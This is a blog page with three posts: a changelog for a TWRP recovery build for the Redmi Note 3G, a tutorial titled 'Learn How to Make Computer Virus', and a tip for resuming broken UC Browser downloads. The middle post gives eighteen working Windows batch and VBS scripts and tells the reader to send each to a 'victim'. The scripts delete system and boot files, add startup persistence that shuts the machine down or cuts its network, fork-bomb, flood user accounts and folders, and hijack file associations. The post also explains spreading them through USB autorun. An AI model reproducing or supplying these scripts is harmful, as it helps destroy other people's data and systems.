Thursday 8 September 2016

[Material Themed]{Omni Build} TWRP 3.0.2-0 {Redmi Note 3G} (MT6592) [STABLE]

                   * * * * * * * * * * * * * * * * * * * * * * * *
                       TWRP 3.0.2-0
                      >>> Material Themed <<<
                   Redmi Note 3G
                      * * * * * * * * * * * * * * * * * * * * * * * *


Changelog:-

-->>TWRP 3.0.2-0

-Based on OMNI Source Build
-Fixed wipe cache clearing taking too long time
-Fixed Battery 1% issue after flashing a rom
-fix a bug with the input box that affected masked inputs (passwords). This fixes decrypt of full device encryption on devices that support decrypt. This bug also impacts encrypted backups. Users are highly encouraged to stop using 3.0.1 if you use encrypted backups or if you need decrypt of data in twrp.
-add greek translation to some builds.

-->> TWRP 3.0.1-0

-support new cm 13.0 pattern encryption (sultanqasim)
-fix slow flashing issue due to modprobe (present on only some devices) (#twrp)
-libtar updated to latest upstream and fixes (jcadduono)
-fixes for loading custom themes (_that)
-twrp will now detect and install twrp themes automatically through the normal zip install process (dees_troy)
-translation updates - added italian, czech and polish and significant updates to dutch
-progress bar improvements - progress bar updates during image flashing and better tracks progress during file system backups (tar) (dees_troy)
-fix input box text display (dees_troy)
-reboot option after zip install complete (bigbiff)
-other mostly invisible bug fixes and improvements

-->> TWRP 3.0.0-0

-completely new theme - much more modern and much nicer looking (by z31s1g)
-true terminal emulator - includes arrow keys, tab and tab completion, etc. (by _that)
-language translation - it won’t be perfect and especially some languages that require large font files like chinese & japanese won’t be availble on most devices. Also some languages may only be partially translated at this time. Feel free to submit more translations to omnirom’s gerrit. (mostly by dees_troy)
-flashing of sparse images - on select devices you will be able to flash some parts of factory images via the twrp gui (by hashbang173)
-adopted storage support for select devices - twrp can now decrypt adopted storage partitions from marshmallow
-reworked graphics to bring us more up to date with aosp - includes support for adf and drm graphics (by dees_troy)
-supersu prompt will no longer display if a marshmallow rom is installed
-update exfat, exfat fuse, dosfstools (by mdmower)
-update aosp base to 6.0
-a huge laundry list of other minor fixes and tweaks

Downloads:-

TWRP 3.0.2



 Credits:-

>> DeesTroy (Dev Of TWRP recovery)
>> z31s1g (For his Awsome Material Theme)
>> At Last Me EndLess (Monty Kumar) For Compiling "TWRP recovery" 

Wednesday 10 June 2015

Learn How to Make Computer Virus !!

Hi Friends

Here I come with New trick . Today i will teach you How to Make Computer Virus . These Virus can destroy anyone's computer .

NOTE :- This is only for Educational Purpose and I am not Responsible if You Destoryed your Computer .

>>What Can a Computer Virus Do ?
>> This virus can format hard disk ,currupt windows , delete important files of windows , freeze desktop,decrease performace ,disable firewalls , and can do lots of mashup with computer .




We have done Lots of Talk :-P

Now Lets Start .....
Open notepad and type or copy below Virus Codes 

1. Shutdown virus :-

Code:

@echo off
msg * I don't like you
shutdown -c "Error! You are too stupid!" -s

Save it as "Anything.BAT" and send it to your victim.


2. Toggle Caps Lock Virus:-

Code:

Set wshShell =wscript.CreateObject("WScript.Shel
l")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop


Save it as "Anything.VBS" and send it to your victim.

3. Automatic Hit Enter Virus :-

Code:

Set wshShell = wscript.CreateObject("WScript.Shell
")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop


Save it as "Anything.VBS" and send it to yuy victim.

4. Automatic Popout CD-Drive Virus:-

Code:

Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop

Save it as "Anything.VBS" and send it to your victim.

5. Format System drive Virus:-

Code:

@echo off
del %systemdrive%*.* /f /s /q
shutdown -r -f -t 00

Save The Above Code As "Anything.bat" and send it to your victim.

6.Crash Computer Virus:-

Code:

Option Explicit

Dim WSHShell
Set WSHShell=Wscript.CreateObject("Wscript.Shell")

Dim x
For x = 1 to 100000000
WSHShell.Run "Tourstart.exe"
Next

Save it as "Anything.VBS" and send it to your victim.

7.Crash Windows Virus :-

Code:

@Echo off
Del C: *.* |y

Save It As "Anything.bat" and send it to your victim.

8. System Bomber :-

Code:

@echo off
attrib -r -s -h c:autoexec.bat
del c:autoexec.bat
attrib -r -s -h c:boot.ini
del c:boot.ini
attrib -r -s -h c:ntldr
del c:ntldr
attrib -r -s -h c:windowswin.ini
del c:windowswin.ini
@echo off
msg * YOU GOT HACKED!!!
shutdown -s -t 7 -c "A VIRUS IS DESTROYING YOU" c:Drive

Save The Above Code As Anything.bat and send it to your victim.
This Will Pop Up A Message Saying "YOU GOT HACKED!!
And Shut Down The Computer TO NEVER Reboot Again!

9.Shutdown Computer Everytime It Starts Virus :-

Code:

echo @echo off>c:windowshartlell.bat
echo break off>>c:windowshartlell.bat
echo shutdown -r -t 11 -f>>c:windowshartlell.bat
echo end>>c:windowshartlell.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v startAPI /t reg_sz /d c:windowshartlell.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v /t reg_sz /d c:windowshartlell.bat /f
echo You have been HACKED.
PAUSE


Save it as "Anything.BAT" and send it to your victim

10.Disable Internet Permanent Virus :-

Code:

echo @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
echo Your Internet has Been HACKED!
PAUSE

Save it as "Anything.BAT" and send it to your victim.

11.Change File Into Unsupported TXT Extension Virus :-

Code:

REN *.DOC *.TXT
REN *.JPEG *.TXT
REN *.LNK *.TXT
REN *.AVI *.TXT
REN *.MPEG *.TXT
REN *.COM *.TXT
REN *.BAT *.TXT

Save it as "Anything.BAT" and send it to your victim.

12.Flood Network Virus :-

Code:

:CRASH
net send * WORKGROUP ENABLED
net send * WORKGROUP ENABLED
GOTO CRASH


Save it as "Anything.BAT" and send it to your victim.

13.Folder Flooder:-

Code:

@echo off
:x
md %random% // makes directory or folder.
goto x

Save it as "Anything.BAT" and send it to your victim.

14.User Acoount Flooder :-

Code:

@echo off
:x
net user %random% /add //create user account
goto x
Save it as "Anything.BAT" and send it to your victim.
15. Application Bomber :-

Code:
@echo off
:a
start notepad
start mspaint 
start cmd
start write
start calc
start control
start explorer
start winword
goto a
Save it as "Anything.BAT" and send it to your victim.


16. Delete Boot File Virus :-

Code:
attrib -S -R -H C:\ntldr 
del ntldr

Save it as "Anything.BAT" and send it to your victim.

17. Freeze Computer Virus :-
Code:
%0|%0
Save it as "Anything.BAT" and send it to your victim .

18. Extension Changer :-

Code:

@echo off
assoc .txt=mk
assoc .exe=mk
assoc .jpeg=mk
assoc .png=mk
assoc .mpeg=mk 

Save it as "Anything.BAT" and send it to your victim.

>>> Spreading Viruses Through Pendrive <<<

Open notepad and write ,
[autorun]
open=anything.bat or anything.vbs  (depends on if virus is batch file or vbs file )
Icon=anything.ico

Save file as ‘autorun.inf’
Step 2: Put this ‘autorun.inf’ and your actual batch virus ‘anything.bat’ in pendrive .

When the victim would plug in pen drive,the autorun.inf will launch anything.bat and commands in batch file virus would execute.

This method only works in windows xp , In Windows 7 or earlier automatic execution is disbaled.







Tuesday 9 June 2015

{Updated Trick} Resume Broken Download Links in Uc Browser [Tested]

Hello Guys ..

This is my first post hehe.
I like to share you my tested and working tricks to you so  keep visiting and keep enjoying tricks.


So lets start here..
1.. If you are dwnlding anything in uc browser and the link brokes in between and not able to resume then dont wrry guys ..i m here to help u

2.... Suppose if you are downoading a file "abc.zip" and your link brokes in between then follow below steps

3.... Goto file explorer and open uc browser folder search for "abc.zip" and "abc.zip.dltemp" files..and cut these two files from that location and paste in any other folder (u can paste these files in "fonts" folder which is present in uc browser already )

4... Now opn uc browser and goto dwnlds and hold "abc.zip"  there an option popsup clik on redownload

5... When the "abc.zip" file dwnlds some of kb ( i suggest you to dwnld atleast 100kb)..then stop the dwnld.

6.. Now goto file explorer opn uc browser folder and delete the two files "abc.zip" and abc.zip.dltemp" which is created by redownload .

7.. Now goto your saved file location (in my case i had saved those two files in fonts folder of uc browser folder) and then simply cut those two files " abc.zip" and "abc.zip.dltemp" frm there to uc browser folder ..

8. Now again goto uc broswer and resume the dwnld "abc.zip" ..  Hurrayy the files starts again from where your download link had broken. .

Enjoy guys :-)
Hey, we've just launched a new custom color Blogger template. You'll like it - https://t.co/quGl87I2PZ
Join Our Newsletter